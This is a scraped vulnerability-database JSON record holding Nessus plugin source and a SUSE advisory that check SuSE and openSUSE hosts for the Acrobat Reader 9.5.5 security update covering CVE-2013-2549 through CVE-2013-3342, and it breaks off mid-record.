\"CVE-2013-2723\", \"CVE-2013-2724\", \"CVE-2013-2725\", \"CVE-2013-2726\", \"CVE-2013-2727\", \"CVE-2013-2729\", \"CVE-2013-2730\", \"CVE-2013-2731\", \"CVE-2013-2732\", \"CVE-2013-2733\", \"CVE-2013-2734\", \"CVE-2013-2735\", \"CVE-2013-2736\", \"CVE-2013-2737\", \"CVE-2013-3337\", \"CVE-2013-3338\", \"CVE-2013-3339\", \"CVE-2013-3340\", \"CVE-2013-3341\", \"CVE-2013-3342\");\n\n script_name(english:\"SuSE 11.2 Security Update : Acrobat Reader (SAT Patch Number 7734)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Acrobat Reader has been updated to version 9.5.5.\n\nThe Adobe Advisory can be found at:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\nThese updates resolve :\n\n - memory corruption vulnerabilities that could lead to\n code execution. (CVE-2013-2718 / CVE-2013-2719 /\n CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 /\n CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 /\n CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 /\n CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 /\n CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 /\n CVE-2013-3341)\n\n - an integer underflow vulnerability that could lead to\n code execution. (CVE-2013-2549)\n\n - a use-after-free vulnerability that could lead to a\n bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - an information leakage issue involving a JavaScript API.\n (CVE-2013-2737)\n\n - a stack overflow vulnerability that could lead to code\n execution. (CVE-2013-2724)\n\n - buffer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2730 / CVE-2013-2733)\n\n - integer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2727 / CVE-2013-2729)\n\n - a flaw in the way Reader handles domains that have been\n blacklisted in the operating system. (CVE-2013-3342)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=819918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2549.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2550.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2718.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2719.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2720.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2721.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2722.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2723.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2724.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2725.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2726.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2727.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2729.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2730.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2731.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2732.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2733.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2734.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2735.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2736.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2737.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3337.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3338.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3341.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3342.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 7734.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-9.5.5-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-cmaps-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-ja-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-ko-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-cmaps-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-ko-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.4.6-0.4.3.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "SuSE 11.2 Security Update : Acrobat Reader (SAT Patch Number 7734)", "type": "nessus", "viewCount": 4}, "differentElements": ["description"], "edition": 4, "lastseen": "2018-09-01T23:34:56"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "c2716a5d83da1721f23778e107a0d6a0"}, {"key": "cvelist", "hash": "dd906d3e06e3de29c2a35454a1d6e8a1"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "3915c269beae984e656e15c5cff71b31"}, {"key": "href", "hash": "b7d964d31ceb19828376c6b29f67ab4f"}, {"key": "modified", "hash": "20176f54edbcd7032dfea78d1cf309a1"}, {"key": "naslFamily", "hash": "71a40666da62ba38d22539c8277870c7"}, {"key": "pluginID", "hash": "ab6cddd653e5a262cf9792179aafae7f"}, {"key": "published", "hash": "9a62ae0ed697cbadc7e7a18563be61a7"}, {"key": "references", "hash": "6b01ab9924b51f2f50795114abfd2971"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "144314e655908bceed52c4a5fb4a5710"}, {"key": "title", "hash": "9b1fd3436c4d001d02a057ece18c32db"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "27f648398389c15a47b1df434de6e82701da9ab9c3209abb9cd2a94c1e585d63", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "suse", "idList": ["SUSE-SU-2013:0809-1"]}, {"type": "nessus", "idList": ["SUSE_ACROREAD-8571.NASL", "OPENSUSE-2013-437.NASL", "REDHAT-RHSA-2013-0826.NASL", "ADOBE_ACROBAT_APSB13-15.NASL", "ADOBE_READER_APSB13-15.NASL", "MACOSX_ADOBE_READER_APSB13-15.NASL", "GENTOO_GLSA-201308-03.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13174"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803617", "OPENVAS:1361412562310803616", "OPENVAS:1361412562310803613", "OPENVAS:1361412562310803614", "OPENVAS:1361412562310803615", "OPENVAS:1361412562310121011"]}, {"type": "redhat", "idList": ["RHSA-2013:0826"]}, {"type": "kaspersky", "idList": ["KLA10457"]}, {"type": "cve", "idList": ["CVE-2013-3338", "CVE-2013-3341", "CVE-2013-2719", "CVE-2013-2720", "CVE-2013-3340", "CVE-2013-2724", "CVE-2013-2718", "CVE-2013-2735", "CVE-2013-2549", "CVE-2013-2732"]}, {"type": "binamuse", "idList": ["BINAMUSE:8184F78DBF0ABBE82A496D8C609F4BEA", "BINAMUSE:F9F25FF8A98B0B91A26198BE57648B2E"]}, {"type": "gentoo", "idList": ["GLSA-201308-03"]}, {"type": "zdi", "idList": ["ZDI-13-106", "ZDI-13-105"]}, {"type": "exploitdb", "idList": ["EDB-ID:26703", "EDB-ID:25725"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/ADOBE_SANDBOX_ADOBECOLLABSYNC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122309", "PACKETSTORM:121711"]}, {"type": "threatpost", "idList": ["THREATPOST:CA0BD9A827AAC3942472B54A5629767D"]}, {"type": "zdt", "idList": ["1337DAY-ID-20799"]}], "modified": "2019-02-21T01:18:56"}, "score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66505);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2014/06/27 10:42:17 $\");\n\n script_cve_id(\"CVE-2013-2549\", \"CVE-2013-2550\", \"CVE-2013-2718\", \"CVE-2013-2719\", \"CVE-2013-2720\", \"CVE-2013-2721\", \"CVE-2013-2722\", \"CVE-2013-2723\", \"CVE-2013-2724\", \"CVE-2013-2725\", \"CVE-2013-2726\", \"CVE-2013-2727\", \"CVE-2013-2729\", \"CVE-2013-2730\", \"CVE-2013-2731\", \"CVE-2013-2732\", \"CVE-2013-2733\", \"CVE-2013-2734\", \"CVE-2013-2735\", \"CVE-2013-2736\", \"CVE-2013-2737\", \"CVE-2013-3337\", \"CVE-2013-3338\", \"CVE-2013-3339\", \"CVE-2013-3340\", \"CVE-2013-3341\", \"CVE-2013-3342\");\n\n script_name(english:\"SuSE 11.2 Security Update : Acrobat Reader (SAT Patch Number 7734)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Acrobat Reader has been updated to version 9.5.5.\n\nThe Adobe Advisory can be found at:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\nThese updates resolve :\n\n - memory corruption vulnerabilities that could lead to\n code execution. (CVE-2013-2718 / CVE-2013-2719 /\n CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 /\n CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 /\n CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 /\n CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 /\n CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 /\n CVE-2013-3341)\n\n - an integer underflow vulnerability that could lead to\n code execution. (CVE-2013-2549)\n\n - a use-after-free vulnerability that could lead to a\n bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - an information leakage issue involving a JavaScript API.\n (CVE-2013-2737)\n\n - a stack overflow vulnerability that could lead to code\n execution. (CVE-2013-2724)\n\n - buffer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2730 / CVE-2013-2733)\n\n - integer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2727 / CVE-2013-2729)\n\n - a flaw in the way Reader handles domains that have been\n blacklisted in the operating system. (CVE-2013-3342)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=819918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2549.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2550.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2718.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2719.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2720.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2721.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2722.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2723.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2724.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2725.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2726.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2727.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2729.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2730.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2731.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2732.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2733.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2734.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2735.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2736.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2737.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3337.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3338.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3341.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3342.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 7734.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-9.5.5-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-cmaps-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-ja-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-ko-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-cmaps-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-ko-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.4.6-0.4.3.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.4.6-0.4.3.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "66505", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko", "p-cpe:/a:novell:suse_linux:11:acroread-cmaps", "p-cpe:/a:novell:suse_linux:11:acroread", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW"], "scheme": null}

{"suse": [{"lastseen": "2016-09-04T12:15:08", "bulletinFamily": "unix", "description": "Acrobat Reader has been updated to version 9.5.5.\n\n The Adobe Advisory can be found at:\n <a rel=\"nofollow\" href=\"https://www.adobe.com/support/security/bulletins/apsb13-15.h\">https://www.adobe.com/support/security/bulletins/apsb13-15.h</a>\n tml\n <<a rel=\"nofollow\" href=\"https://www.adobe.com/support/security/bulletins/apsb13-15\">https://www.adobe.com/support/security/bulletins/apsb13-15</a>.\n html>\n\n These updates resolve:\n\n *\n\n memory corruption vulnerabilities that could lead to\n code execution (CVE-2013-2718, CVE-2013-2719,\n CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723,\n CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-3337,\n CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, CVE-2013-3341).\n\n *\n\n an integer underflow vulnerability that could lead to\n code execution (CVE-2013-2549).\n\n *\n\n a use-after-free vulnerability that could lead to a\n bypass of Adobe Reader's sandbox protection (CVE-2013-2550).\n\n *\n\n an information leakage issue involving a Javascript\n API (CVE-2013-2737).\n\n *\n\n a stack overflow vulnerability that could lead to\n code execution (CVE-2013-2724).\n\n *\n\n buffer overflow vulnerabilities that could lead to\n code execution (CVE-2013-2730, CVE-2013-2733).\n\n *\n\n integer overflow vulnerabilities that could lead to\n code execution (CVE-2013-2727, CVE-2013-2729).\n\n *\n\n a flaw in the way Reader handles domains that have\n been blacklisted in the operating system (CVE-2013-3342).\n", "modified": "2013-05-18T00:04:57", "published": "2013-05-18T00:04:57", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-05/msg00004.html", "id": "SUSE-SU-2013:0809-1", "title": "Security update for Acrobat Reader (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:21:31", "bulletinFamily": "scanner", "description": "Acroread was updated to 9.5.5 for bnc#819918(swampid#52449).\n\nMore information can be found on:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\n(CVE-2013-2549, CVE-2013-2550, CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2724, CVE-2013-2725, CVE-2013-2726, CVE-2013-2727, CVE-2013-2729, CVE-2013-2730, CVE-2013-2731, CVE-2013-2732, CVE-2013-2733, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-2737, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, CVE-2013-3341, CVE-2013-3342)", "modified": "2018-11-10T00:00:00", "id": "OPENSUSE-2013-437.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=75008", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : acroread (openSUSE-SU-2013:0990-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-437.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75008);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/10 11:50:01\");\n\n script_cve_id(\"CVE-2013-2549\", \"CVE-2013-2550\", \"CVE-2013-2718\", \"CVE-2013-2719\", \"CVE-2013-2720\", \"CVE-2013-2721\", \"CVE-2013-2722\", \"CVE-2013-2723\", \"CVE-2013-2724\", \"CVE-2013-2725\", \"CVE-2013-2726\", \"CVE-2013-2727\", \"CVE-2013-2729\", \"CVE-2013-2730\", \"CVE-2013-2731\", \"CVE-2013-2732\", \"CVE-2013-2733\", \"CVE-2013-2734\", \"CVE-2013-2735\", \"CVE-2013-2736\", \"CVE-2013-2737\", \"CVE-2013-3337\", \"CVE-2013-3338\", \"CVE-2013-3339\", \"CVE-2013-3340\", \"CVE-2013-3341\", \"CVE-2013-3342\");\n script_bugtraq_id(58398, 58568, 59902, 59903, 59904, 59905, 59906, 59907, 59908, 59909, 59910, 59911, 59912, 59913, 59914, 59915, 59916, 59917, 59918, 59919, 59920, 59921, 59923, 59925, 59926, 59927, 59930);\n\n script_name(english:\"openSUSE Security Update : acroread (openSUSE-SU-2013:0990-1)\");\n script_summary(english:\"Check for the openSUSE-2013-437 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Acroread was updated to 